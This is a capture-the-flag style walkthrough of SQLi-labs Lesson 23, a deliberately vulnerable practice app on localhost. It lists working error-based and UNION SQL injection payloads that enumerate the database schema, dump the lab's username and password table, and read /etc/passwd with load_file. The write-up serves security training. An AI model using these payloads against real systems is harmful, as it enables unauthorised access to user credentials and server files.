SQLi-labs: Lesson 23

Get - Error based - strip comments

  1. http://localhost/sqli/Less-23/?id=1'

    error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

  2. Basic injection: ?id=' or '1'='1

  3. Try union select: ?id=' union select 1,2 or '1'='1

error message: The used SELECT statements have a different number of columns

So try this: ?id=' union select 1,2,3 or '1'='1 It works!

Now let's play!

  1. Get version: ?id=' union select 1,version(),3 or '1'='1

    Result:

    Your Login name:5.6.30-1

    Your Password:1

  2. Get database name: ?id=' union select 1,database(),3 or '1'='1

    Result:

    Your Login name:security

  3. Get table name: ?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

    Result:

    Your Login name:emails,referers,uagents,users

  4. Get column name: ?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

    Result:

    Your Login name:id,username,password

  5. Get id\username\password pairs: ?id=' union select 1,(select group_concat(id,0x5c,username,0x5c,password) from users limit 0,1),3 or '1'='1

    Result:

    Your Login name:1\Dumb\Dumb,2\Angelina\I-kill-you,3\Dummy\p@ssword,4\secure\crappy,5\stupid\stupidity,6\superman\genious,7\batman\mob!le,8\admin\admin,9\admin1\admin1,10\admin2\admin2,11\admin3\admin3,12\dhakkan\dumbo,14\admin4\admin4

  6. Do something funny: ?id=' union select 1,load_file("/etc/passwd"),3 or '1'='1

results matching ""

    No results matching ""